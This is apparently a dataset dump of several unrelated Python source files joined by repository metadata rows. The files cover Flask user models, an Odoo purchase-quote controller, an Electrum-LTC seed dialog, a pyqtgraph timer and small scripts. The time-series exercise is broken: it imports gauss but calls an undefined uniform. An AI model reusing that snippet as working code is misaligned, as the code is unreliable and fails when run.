words_neu['en'] = []
words_neu['es'] = []
words_pos['pt'] = []
words_pos['en'] = []
words_pos['es'] = []
#neg_freq.plot(30, cumulative=False)
translator = Translator(service_urls=['translate.google.com','translate.google.com.br'])
for (ng,nu,ps) in tupla:
vet_neg.append(ng[0])
vet_neu.append(nu[0])
vet_pos.append(ps[0])
vet_neg, vet_neu,vet_pos = exlusivos(vet_neg,vet_neu,vet_pos)
tupla = zip(vet_neg[:50],vet_neu[:50],vet_pos[:50])
for (ng,nu,ps) in tupla:
words_neg['pt'].append(ng)
en=translator.translate(ng, dest='en').text
words_neg['en'].append(en)
words_neg['es'].append(translator.translate(en, dest='es').text)
words_neu['pt'].append(nu)
en=translator.translate(nu, dest='en').text
words_neu['en'].append(en)
words_neu['es'].append(translator.translate(en, dest='es').text)
words_pos['pt'].append(ps)
en=translator.translate(ps, dest='en').text
words_pos['en'].append(en)
words_pos['es'].append(translator.translate(en, dest='es').text)
df_neg['pt'] = words_neg['pt']
df_neg['en'] = words_neg['en']
df_neg['es'] = words_neg['es']
df_neu['pt'] = words_neu['pt']
df_neu['en'] = words_neu['en']
df_neu['es'] = words_neu['es']
df_pos['pt'] = words_pos['pt']
df_pos['en'] = words_pos['en']
df_pos['es'] = words_pos['es']
write_csv(df_neg,'bigram_neg')
write_csv(df_neu,'bigram_neu')
write_csv(df_pos,'bigram_pos')
| gpl-3.0 | -3,722,365,995,457,834,500 | 26.039773 | 133 | 0.566085 | false |
evereux/flask_template | application/models.py | 1 | 2773 | import datetime
from application import db
from config import admin_group_name
Base = db.Model
username_maxlength = 24
name_maxlength = 60
email_maxlength = 24
group_maxlength = 64
groups = db.Table('groups',
db.Column('user_id', db.Integer, db.ForeignKey('users.id')),
db.Column('group_id', db.Integer, db.ForeignKey('group.id'))
)
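# Editorial note (not in the original source): `groups` is a bare association
# table backing the User <-> Group many-to-many relationship declared on
# Group.users below; a hypothetical lookup reads:
#
#   user = User.query.filter_by(username='alice').first()
#   names = [g.group_name for g in user.groups]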
class User(Base):
# defines tablename as it will be create in SQL
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(username_maxlength), index=True, unique=True)
name = db.Column(db.String(name_maxlength))
password = db.Column(db.LargeBinary(60))
email = db.Column(db.String(email_maxlength), unique=True)
date_added = db.Column(db.DateTime)
date_modified = db.Column(db.DateTime, onupdate=datetime.datetime.now)
def __init__(self, username, name, email, password):
self.username = username
self.name = name
self.password = password
self.email = email
def __repr__(self):
return '<User {}>'.format(self.username)
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
@property
def is_admin(self):
""" returns true if the user is a member of the 'admin' group"""
user = User.query.filter_by(id = self.id).first()
for g in user.groups:
if g.group_name == admin_group_name:
return True
def get_id(self):
return str(self.id)
class Group(Base):
id = db.Column(db.Integer, primary_key=True)
group_name = db.Column(db.String(group_maxlength))
users = db.relationship('User',
secondary=groups,
backref=db.backref('groups',
lazy='dynamic',
order_by=group_name
)
)
# this is for when a group has many groups
# ie everyone in group 'admin' can be a member of group 'all'
# parents = db.relationship('Group',
# secondary=group_to_group,
# primaryjoin=id==group_to_group.c.parent_id,
# secondaryjoin=id==group_to_group.c.child_id,
# backref="children",
# remote_side=[group_to_group.c.parent_id])
def __init__(self, group_name):
self.group_name = group_name
    def __repr__(self):
        return self.group_name
| mit | 7,453,348,614,232,633,000 | 29.472527 | 80 | 0.547782 | false |
bringsvor/bc_website_purchase | controllers/main.py | 1 | 11590 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
import werkzeug
import datetime
import time
import logging
import base64
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class purchase_quote(http.Controller):
@http.route([
"/purchase/<int:order_id>",
"/purchase/<int:order_id>/<token>"
], type='http', auth="public", website=True)
def view(self, order_id, token=None, message=False, **post):
# use SUPERUSER_ID allow to access/view order for public user
# only if he knows the private token
user_obj = request.registry.get('res.users')
group_obj = request.registry.get('res.groups')
user = user_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, request.uid)
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, token and SUPERUSER_ID or request.uid, order_id)
now = time.strftime('%Y-%m-%d')
"""
if token:
if token != order.access_token:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier ')
self.__message_post(body, order_id, type='comment')
"""
# if token is None and ( request.uid==user.id and user.active==False ):
if ( request.uid==user.id and user.active==False ):
if request.env.ref('web.login', False):
values = request.params.copy() or {}
values["redirect"] = "/purchase/%i" % (order_id);
return request.render('web.login', values)
# Checks groups
broker = False
# import pdb;pdb.set_trace()
for group_id in user.groups_id:
group = group_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, group_id.id)
if group.name == 'Elmatica Broker':
broker = True
if not broker:
partner_id = user.partner_id.parent_id.id or user.partner_id.id
if partner_id and request.uid != SUPERUSER_ID:
if partner_id != order.partner_id.id:
return request.website.render('website.404')
else:
if request.uid != SUPERUSER_ID:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier')
self.__message_post(body, order_id, type='comment')
# If the supplier is viewing this, he has received it. If he has received it it must be sent
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'send_rfq', context=request.context)
days = 0
if order.validity_date:
days = (datetime.datetime.strptime(order.validity_date, '%Y-%m-%d') - datetime.datetime.now()).days + 1
values = {
'quotation': order,
'message': message and int(message) or False,
'option': bool(filter(lambda x: not x.line_id, order.options)),
'order_valid': (not order.validity_date) or (now <= order.validity_date),
'days_valid': max(days, 0)
}
return request.website.render('bc_website_purchase.po_quotation', values)
# @http.route(['/purchase/accept'], type='json', auth="public", website=True)
@http.route(['/purchase/<int:order_id>/<token>/accept'], type='http', auth="public", website=True)
def accept(self, order_id, token=None, signer=None, sign=None, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
attachments=sign and [('signature.png', sign.decode('base64'))] or []
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
message = _('RFQ signed by %s') % (signer,)
self.__message_post(message, order_id, type='comment', subtype='mt_comment', attachments=attachments)
return werkzeug.utils.redirect("/purchase/%s" % (order_id))
@http.route(['/purchase/<int:order_id>/<token>/decline'], type='http', auth="public", website=True)
def decline(self, order_id, token, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
request.registry.get('purchase.order').action_cancel(request.cr, SUPERUSER_ID, [order_id])
message = post.get('decline_message')
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment')
return werkzeug.utils.redirect("/purchase/%s/%s?message=2" % (order_id, token))
@http.route(['/purchase/<int:order_id>/<token>/post'], type='http', auth="public", website=True)
def post(self, order_id, token, **post):
# use SUPERUSER_ID allow to access/view order for public user
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
message = post.get('comment')
ufile = post.get('attachment')
attachment_ids = []
kwargs = {}
if token != order.access_token:
return request.website.render('website.404')
if ufile:
Model = request.session.model('ir.attachment')
try:
data_attach = {
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': 'purchase.order',
'res_id': int(order_id)
}
attachment_id = Model.create( data_attach, request.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
#attachment_ids.append((0, 0, data_attach))
attachment_ids.append(attachment_id)
kwargs = { 'attachment_ids': attachment_ids }
except Exception:
args = {'error': "Something horrible happened"}
_logger.exception("Fail to upload attachment %s" % ufile.filename)
return werkzeug.utils.redirect("/purchase/%s/%s?message=0" % (order_id, token))
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment',**kwargs)
return werkzeug.utils.redirect("/purchase/%s/%s?message=1" % (order_id, token))
# def __message_post(self, message, order_id, type='comment', subtype=False, attachments=[]):
def __message_post(self, message, order_id, type='comment', subtype=False, **kwargs):
request.session.body = message
cr, uid, context = request.cr, request.uid, request.context
user = request.registry['res.users'].browse(cr, SUPERUSER_ID, uid, context=context)
if 'body' in request.session and request.session.body:
request.registry.get('purchase.order').message_post(cr, SUPERUSER_ID, order_id,
body=request.session.body,
type=type,
subtype=subtype,
author_id=user.partner_id.id,
context=context,
attachments=None,
parent_id=False,
subject=None,
content_subtype='html',
**kwargs
)
request.session.body = False
return True
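    # Editorial sketch (not in the original source): the **kwargs plumbing
    # above is how post() forwards uploaded files, e.g.
    #
    #   self.__message_post("Delivery note attached", order_id,
    #                       type='comment', subtype='mt_comment',
    #                       attachment_ids=[attachment_id])
    #
    # where attachment_ids lists ids of ir.attachment records created earlier.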
@http.route(['/purchase/update_line'], type='json', auth="public", website=True)
# def update_line(self, update_data, **post):
def update_line(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent'):
return False
# import pdb;pdb.set_trace()
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
try:
leadtime = post['leadtime'][i]
except:
leadtime = 0
pass
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
'leadtime': leadtime,
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
return True
@http.route(['/purchase/save'], type='json', auth="public", website=True)
def save(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent','confirmed','approved'):
return False
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
#try:
# leadtime = post['leadtime'][i]
#except:
# leadtime = 0
# pass
if order.state in ('draft','sent'):
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
# 'leadtime': leadtime,
}
else:
vals = {
'date_code': post['date_code'][i],
'units_shipped': post['units_shipped'][i],
'weight': post['weight'][i],
'collies': post['collies'][i],
'units_in_stock': post['units_in_stock'][i],
'lot_week': post['lot_week'][i],
'lot_year': post['lot_year'][i],
'batch_number': post['batch_number'][i],
'tracking_number': post['tracking_number'][i],
'expiry_date': post['expiry_date'][i],
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.write(request.cr,SUPERUSER_ID,[order_id],{'saved': True},context=request.context)
return True
@http.route(["/purchase/template/<model('purchase.quote.template'):quote>"], type='http', auth="user", website=True)
def template_view(self, quote, **post):
values = { 'template': quote }
return request.website.render('bc_website_purchase.po_template', values)
| agpl-3.0 | -1,163,517,802,710,959,900 | 41.925926 | 120 | 0.605091 | false |
xiefeimcu/mcu_code | Python/pyqt/rtuUI/rtuMsg.py | 1 | 3918 | __author__ = 'xiefei'
import sys
import time
import datetime
import binascii
stu = {
'IDT_TT': 'TT' ,
'IDT_ST' : 'ST' ,
'IDT_RGZS' : 'RGZS' ,
'IDT_PIC' : 'PIC' ,
'IDT_DRP' : 'DRP' ,
'IDT_DRZ1' : 'DRZ1' ,
'IDT_DRZ2' : 'DRZ2' ,
'IDT_DRZ3' : 'DRZ3' ,
'IDT_DRZ4' : 'DRZ4' ,
'IDT_DRZ5' : 'DRZ5' ,
'IDT_DRZ6' : 'DRZ6' ,
'IDT_DRZ7' : 'DRZ7' ,
'IDT_DRZ8' : 'DRZ8' ,
'IDT_DATA' : 'DATA' ,
'IDT_AC' : 'AC' ,
'IDT_AI' : 'AI' ,
'IDT_C' : 'C' ,
'IDT_DRxnn' : 'DRxnn' ,
'IDT_DT' : 'DT' ,
'IDT_ED' : 'ED' ,
'IDT_EJ' : 'EJ' ,
'IDT_FL' : 'FL' ,
'IDT_GH' : 'GH' ,
'IDT_GN' : 'GN' ,
'IDT_GS' : 'GS' ,
'IDT_GT' : 'GT' ,
'IDT_GTP' : 'GTP' ,
'IDT_H' : 'H' ,
'IDT_HW' : 'HW' ,
'IDT_M10' : 'M10' ,
'IDT_M20' : 'M20' ,
'IDT_M30' : 'M30' ,
'IDT_M40' : 'M40' ,
'IDT_M50' : 'M50' ,
'IDT_M60' : 'M60' ,
'IDT_M80' : 'M80' ,
'IDT_M100' : 'M100' ,
'IDT_MST' : 'MST' ,
'IDT_NS' : 'NS' ,
'IDT_P1' : 'P1' ,
'IDT_P2' : 'P2' ,
'IDT_P3' : 'P3' ,
'IDT_P6' : 'P6' ,
'IDT_P12' : 'P12' ,
'IDT_PD' : 'PD' ,
'IDT_PJ' : 'PJ' ,
'IDT_PN01' : 'PN01' ,
'IDT_PN05' : 'PN05' ,
'IDT_PN10' : 'PN10' ,
'IDT_PN30' : 'PN30' ,
'IDT_PR' : 'PR' ,
'IDT_PT' : 'PT' ,
    'IDT_Q' : 'Q' ,
'IDT_Q1' : 'Q1' ,
'IDT_Q2' : 'Q2' ,
'IDT_Q3' : 'Q3' ,
'IDT_Q4' : 'Q4' ,
'IDT_Q5' : 'Q5' ,
'IDT_Q6' : 'Q6' ,
'IDT_Q7' : 'Q7' ,
'IDT_Q8' : 'Q8' ,
'IDT_QA' : 'QA' ,
'IDT_QZ' : 'QZ' ,
'IDT_SW' : 'SW' ,
'IDT_UC' : 'UC' ,
'IDT_UE' : 'UE' ,
'IDT_US' : 'US' ,
'IDT_VA' : 'VA' ,
'IDT_VJ' : 'VJ' ,
'IDT_VT' : 'VT' ,
'IDT_Z' : 'Z' ,
'IDT_ZB' : 'ZB' ,
'IDT_ZU' : 'ZU' ,
'IDT_Z1' : 'Z1' ,
'IDT_Z2' : 'Z2' ,
'IDT_Z3' : 'Z3' ,
'IDT_Z4' : 'Z4' ,
'IDT_Z5' : 'Z5' ,
'IDT_Z6' : 'Z6' ,
'IDT_Z7' : 'Z7' ,
'IDT_Z8' : 'Z8' ,
'IDT_SQ' : 'SQ' ,
'IDT_ZT' : 'ZT' ,
'IDT_pH' : 'pH' ,
'IDT_DO' : 'DO' ,
'IDT_COND' : 'COND' ,
'IDT_TURB' : 'TURB' ,
'IDT_CODMN' : 'CODMN' ,
'IDT_REDOX' : 'REDOX' ,
'IDT_NH4N' : 'NH4N' ,
'IDT_TP' : 'TP' ,
'IDT_TN' : 'TN' ,
'IDT_TOC' : 'TOC' ,
'IDT_CU' : 'CU' ,
'IDT_ZN' : 'ZN' ,
'IDT_SE' : 'SE' ,
'IDT_AS' : 'AS' ,
'IDT_THG' : 'THG' ,
'IDT_CD' : 'CD' ,
'IDT_PB' : 'PB' ,
'IDT_CHLA' : 'CHLA' ,
'IDT_WP1' : 'WP1' ,
'IDT_WP2' : 'WP2' ,
'IDT_WP3' : 'WP3' ,
'IDT_WP4' : 'WP4' ,
'IDT_WP5' : 'WP5' ,
'IDT_WP6' : 'WP6' ,
'IDT_WP7' : 'WP7' ,
'IDT_WP8' : 'WP8' ,
'IDT_SYL1' : 'SYL1' ,
'IDT_SYL2' : 'SYL2' ,
'IDT_SYL3' : 'SYL3' ,
'IDT_SYL4' : 'SYL4' ,
'IDT_SYL5' : 'SYL5' ,
'IDT_SYL6' : 'SYL6' ,
'IDT_SYL7' : 'SYL7' ,
'IDT_SYL8' : 'SYL8' ,
'IDT_SBL1' : 'SBL1' ,
'IDT_SBL2' : 'SBL2' ,
'IDT_SBL3' : 'SBL3' ,
'IDT_SBL4' : 'SBL4' ,
'IDT_SBL5' : 'SBL5' ,
'IDT_SBL6' : 'SBL6' ,
'IDT_SBL7' : 'SBL7' ,
'IDT_SBL8' : 'SBL8' ,
'IDT_VTA' : 'VTA' ,
'IDT_VTB' : 'VTB' ,
'IDT_VTC' : 'VTC' ,
'IDT_VIA' : 'VIA' ,
'IDT_VIB' : 'VIB' ,
'IDT_VIC' : 'VIC' ,
}
class messag ():
def getSystimeS(self):
return time.strftime("%y%m%d%H%M%S")
def getSystime(self):
return time.strftime("%y%m%d%H%M")
def sendRtuArgTable(self, data, Len):
print(str(data))
print(stu.get('IDT_VIC'))
def initRtu(self):
        self.sendRtuArgTable('nihao', 5)
| gpl-3.0 | -2,833,789,607,036,971,000 | 23.641509 | 46 | 0.351965 | false |
philanthropy-u/edx-platform | openedx/features/partners/admin.py | 1 | 1216 | from django.contrib import admin
from django.urls import reverse
from .models import Partner, PartnerCommunity, PartnerUser
class PartnerAdmin(admin.ModelAdmin):
"""
Django admin customizations for Partner model
"""
list_display = ('id', 'label', 'slug', 'partner_url')
readonly_fields = ('partner_url',)
def partner_url(self, obj):
if obj.slug:
return reverse('partner_url', kwargs={'slug': obj.slug})
class PartnerUserModelAdmin(admin.ModelAdmin):
"""
Django admin to verify if user is affiliated with partner or not after login or registration
"""
raw_id_fields = ('user',)
class PartnerCommunityModelAdmin(admin.ModelAdmin):
"""
Django admin model to add community id to partner so that every user is added automatically to that community
"""
list_display = ['id', 'partner', 'community_id']
search_fields = ('partner', 'community_id')
class Meta(object):
verbose_name = 'Partner Community'
verbose_name_plural = 'Partner Communities'
admin.site.register(Partner, PartnerAdmin)
admin.site.register(PartnerCommunity, PartnerCommunityModelAdmin)
admin.site.register(PartnerUser, PartnerUserModelAdmin)
| agpl-3.0 | 6,408,310,665,756,646,000 | 28.658537 | 113 | 0.702303 | false |
vialectrum/vialectrum | electrum_ltc/gui/qt/seed_dialog.py | 1 | 9848 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import (QVBoxLayout, QCheckBox, QHBoxLayout, QLineEdit,
QLabel, QCompleter, QDialog, QStyledItemDelegate)
from electrum_ltc.i18n import _
from electrum_ltc.mnemonic import Mnemonic, seed_type
from electrum_ltc import old_mnemonic
from .util import (Buttons, OkButton, WWLabel, ButtonsTextEdit, icon_path,
EnterButton, CloseButton, WindowModalDialog, ColorScheme)
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .completion_text_edit import CompletionTextEdit
def seed_warning_msg(seed):
return ''.join([
"<p>",
_("Please save these {0} words on paper (order is important). "),
_("This seed will allow you to recover your wallet in case "
"of computer failure."),
"</p>",
"<b>" + _("WARNING") + ":</b>",
"<ul>",
"<li>" + _("Never disclose your seed.") + "</li>",
"<li>" + _("Never type it on a website.") + "</li>",
"<li>" + _("Do not store it electronically.") + "</li>",
"</ul>"
]).format(len(seed.split()))
class SeedLayout(QVBoxLayout):
def seed_options(self):
dialog = QDialog()
vbox = QVBoxLayout(dialog)
if 'ext' in self.options:
cb_ext = QCheckBox(_('Extend this seed with custom words'))
cb_ext.setChecked(self.is_ext)
vbox.addWidget(cb_ext)
if 'bip39' in self.options:
def f(b):
self.is_seed = (lambda x: bool(x)) if b else self.saved_is_seed
self.is_bip39 = b
self.on_edit()
if b:
msg = ' '.join([
'<b>' + _('Warning') + ':</b> ',
_('BIP39 seeds can be imported in Electrum, so that users can access funds locked in other wallets.'),
_('However, we do not generate BIP39 seeds, because they do not meet our safety standard.'),
_('BIP39 seeds do not include a version number, which compromises compatibility with future software.'),
_('We do not guarantee that BIP39 imports will always be supported in Electrum.'),
])
else:
msg = ''
self.seed_warning.setText(msg)
cb_bip39 = QCheckBox(_('BIP39 seed'))
cb_bip39.toggled.connect(f)
cb_bip39.setChecked(self.is_bip39)
vbox.addWidget(cb_bip39)
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
self.is_ext = cb_ext.isChecked() if 'ext' in self.options else False
self.is_bip39 = cb_bip39.isChecked() if 'bip39' in self.options else False
def __init__(self, seed=None, title=None, icon=True, msg=None, options=None,
is_seed=None, passphrase=None, parent=None, for_seed_words=True):
QVBoxLayout.__init__(self)
self.parent = parent
self.options = options
if title:
self.addWidget(WWLabel(title))
if seed: # "read only", we already have the text
if for_seed_words:
self.seed_e = ButtonsTextEdit()
else: # e.g. xpub
self.seed_e = ShowQRTextEdit()
self.seed_e.setReadOnly(True)
self.seed_e.setText(seed)
else: # we expect user to enter text
assert for_seed_words
self.seed_e = CompletionTextEdit()
self.seed_e.setTabChangesFocus(False) # so that tab auto-completes
self.is_seed = is_seed
self.saved_is_seed = self.is_seed
self.seed_e.textChanged.connect(self.on_edit)
self.initialize_completer()
self.seed_e.setMaximumHeight(75)
hbox = QHBoxLayout()
if icon:
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("seed.png"))
.scaledToWidth(64, mode=Qt.SmoothTransformation))
logo.setMaximumWidth(60)
hbox.addWidget(logo)
hbox.addWidget(self.seed_e)
self.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addStretch(1)
self.seed_type_label = QLabel('')
hbox.addWidget(self.seed_type_label)
# options
self.is_bip39 = False
self.is_ext = False
if options:
opt_button = EnterButton(_('Options'), self.seed_options)
hbox.addWidget(opt_button)
self.addLayout(hbox)
if passphrase:
hbox = QHBoxLayout()
passphrase_e = QLineEdit()
passphrase_e.setText(passphrase)
passphrase_e.setReadOnly(True)
hbox.addWidget(QLabel(_("Your seed extension is") + ':'))
hbox.addWidget(passphrase_e)
self.addLayout(hbox)
self.addStretch(1)
self.seed_warning = WWLabel('')
if msg:
self.seed_warning.setText(seed_warning_msg(seed))
self.addWidget(self.seed_warning)
def initialize_completer(self):
bip39_english_list = Mnemonic('en').wordlist
old_list = old_mnemonic.wordlist
only_old_list = set(old_list) - set(bip39_english_list)
self.wordlist = list(bip39_english_list) + list(only_old_list) # concat both lists
self.wordlist.sort()
class CompleterDelegate(QStyledItemDelegate):
def initStyleOption(self, option, index):
super().initStyleOption(option, index)
# Some people complained that due to merging the two word lists,
# it is difficult to restore from a metal backup, as they planned
# to rely on the "4 letter prefixes are unique in bip39 word list" property.
# So we color words that are only in old list.
if option.text in only_old_list:
# yellow bg looks ~ok on both light/dark theme, regardless if (un)selected
option.backgroundBrush = ColorScheme.YELLOW.as_color(background=True)
self.completer = QCompleter(self.wordlist)
delegate = CompleterDelegate(self.seed_e)
self.completer.popup().setItemDelegate(delegate)
self.seed_e.set_completer(self.completer)
def get_seed(self):
text = self.seed_e.text()
return ' '.join(text.split())
def on_edit(self):
s = self.get_seed()
b = self.is_seed(s)
if not self.is_bip39:
t = seed_type(s)
label = _('Seed Type') + ': ' + t if t else ''
else:
from electrum_ltc.keystore import bip39_is_checksum_valid
is_checksum, is_wordlist = bip39_is_checksum_valid(s)
status = ('checksum: ' + ('ok' if is_checksum else 'failed')) if is_wordlist else 'unknown wordlist'
label = 'BIP39' + ' (%s)'%status
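            # e.g. label becomes "BIP39 (checksum: ok)", "BIP39 (checksum: failed)"
            # or "BIP39 (unknown wordlist)" (illustrative values)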
self.seed_type_label.setText(label)
self.parent.next_button.setEnabled(b)
# disable suggestions if user already typed an unknown word
for word in self.get_seed().split(" ")[:-1]:
if word not in self.wordlist:
self.seed_e.disable_suggestions()
return
self.seed_e.enable_suggestions()
class KeysLayout(QVBoxLayout):
def __init__(self, parent=None, header_layout=None, is_valid=None, allow_multi=False):
QVBoxLayout.__init__(self)
self.parent = parent
self.is_valid = is_valid
self.text_e = ScanQRTextEdit(allow_multi=allow_multi)
self.text_e.textChanged.connect(self.on_edit)
if isinstance(header_layout, str):
self.addWidget(WWLabel(header_layout))
else:
self.addLayout(header_layout)
self.addWidget(self.text_e)
def get_text(self):
return self.text_e.text()
def on_edit(self):
valid = False
try:
valid = self.is_valid(self.get_text())
except Exception as e:
self.parent.next_button.setToolTip(f'{_("Error")}: {str(e)}')
else:
self.parent.next_button.setToolTip('')
self.parent.next_button.setEnabled(valid)
class SeedDialog(WindowModalDialog):
def __init__(self, parent, seed, passphrase):
WindowModalDialog.__init__(self, parent, ('Vialectrum - ' + _('Seed')))
self.setMinimumWidth(400)
vbox = QVBoxLayout(self)
title = _("Your wallet generation seed is:")
slayout = SeedLayout(title=title, seed=seed, msg=True, passphrase=passphrase)
vbox.addLayout(slayout)
vbox.addLayout(Buttons(CloseButton(self)))
| mit | 6,886,666,293,626,559,000 | 40.906383 | 128 | 0.60134 | false |
hahnicity/ace | chapter1/problem3.py | 1 | 1222 | """
Problem 3.
Calculate the time series
yt = 5 + .05 * t + Et (where Et is an epsilon noise term)
for the years 1960, 1961, ..., 2001, assuming the Et are independently and
identically distributed with mean 0 and sigma 0.2.
"""
from random import gauss
from matplotlib.pyplot import plot, show
from numpy import array, polyfit, poly1d
def create_distribution(size):
"""
Create a distribution, identically distributed, with mean 0 and
sigma 0.2
"""
# Shit it's way easier to just do some uniform distribution
# This is a bit over my head, and not possible for me without
# pen and paper
return array([uniform(-0.2, .2) for _ in xrange(size)])
def create_time_series(start_year, end_year):
"""
    Create the time series yt, perform a linear regression on it, and plot
    yt together with its trendline
"""
t_array = array(range(start_year, end_year + 1))
epsilon_t = create_distribution(len(t_array))
yt = array([5 + .05 * t_i + epsilon_t[i] for i, t_i in enumerate(t_array)])
fit = polyfit(t_array, yt, 1)
fit_func = poly1d(fit)
plot(t_array, yt, "yo", t_array, fit_func(t_array), "--k")
show()
def main():
create_time_series(1960, 2001)
if __name__ == "__main__":
main()
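# Sanity check (illustrative): the fitted trendline should recover a slope
# near 0.05 and an intercept near 5, up to the noise in epsilon_t.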
| unlicense | -3,859,389,947,506,041,300 | 25 | 79 | 0.644845 | false |
robertsj/poropy | pyqtgraph/ThreadsafeTimer.py | 1 | 1600 | from pyqtgraph.Qt import QtCore, QtGui
class ThreadsafeTimer(QtCore.QObject):
"""
Thread-safe replacement for QTimer.
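    Qt timers may only be started or stopped from the thread that owns them;
    this class forwards start()/stop() calls made from other threads to the
    GUI thread through queued signal connections. Illustrative usage
    (assuming a running QApplication):
        t = ThreadsafeTimer()
        t.timeout.connect(callback)
        t.start(1000)  # safe even from a worker thread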
"""
timeout = QtCore.Signal()
sigTimerStopRequested = QtCore.Signal()
sigTimerStartRequested = QtCore.Signal(object)
def __init__(self):
QtCore.QObject.__init__(self)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.timerFinished)
self.timer.moveToThread(QtCore.QCoreApplication.instance().thread())
self.moveToThread(QtCore.QCoreApplication.instance().thread())
self.sigTimerStopRequested.connect(self.stop, QtCore.Qt.QueuedConnection)
self.sigTimerStartRequested.connect(self.start, QtCore.Qt.QueuedConnection)
def start(self, timeout):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "start timer", self, "from gui thread"
self.timer.start(timeout)
else:
#print "start timer", self, "from remote thread"
self.sigTimerStartRequested.emit(timeout)
def stop(self):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "stop timer", self, "from gui thread"
self.timer.stop()
else:
#print "stop timer", self, "from remote thread"
self.sigTimerStopRequested.emit()
def timerFinished(self):
self.timeout.emit() | mit | 4,284,573,127,986,131,500 | 37.073171 | 99 | 0.6225 | false |
glaserti/LibraryTwitter | Python/1 - CSV from HTMLsource.py | 1 | 7213 | #
# Scraping website for information about libraries
#
# For getting information about the libraries, the database of the German Library Statistics (Deutsche Bibliotheksstatistik/DBS) which is hosted by the HBZ was used:
#
# http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/bibs.php
#
# For this project, 4 different requests were made:
#
# 1. DBS National Libraries ( == > 3 active<sup>(1)</sup> libraries)
# 1. DBS Section 4: University Libraries (i.e. not the entire Section 4 was queried) ( == > 83 active<sup>(2)</sup> libraries)
# 1. DBS Section 1: Public Libraries with population > 400,000 ( == > 18 libraries)<sup>(3)</sup>
# 1. DBS Section 2: Public Libraries with population > 100,000 ( == > 81 libraries)<sup>(4)</sup>
#
# Since the website doesn't give unique URLs for individual requests,
# you could download the source code of each database request and safe as html files.
#
# However, you could use the _printing page_ of the database result list, which returns
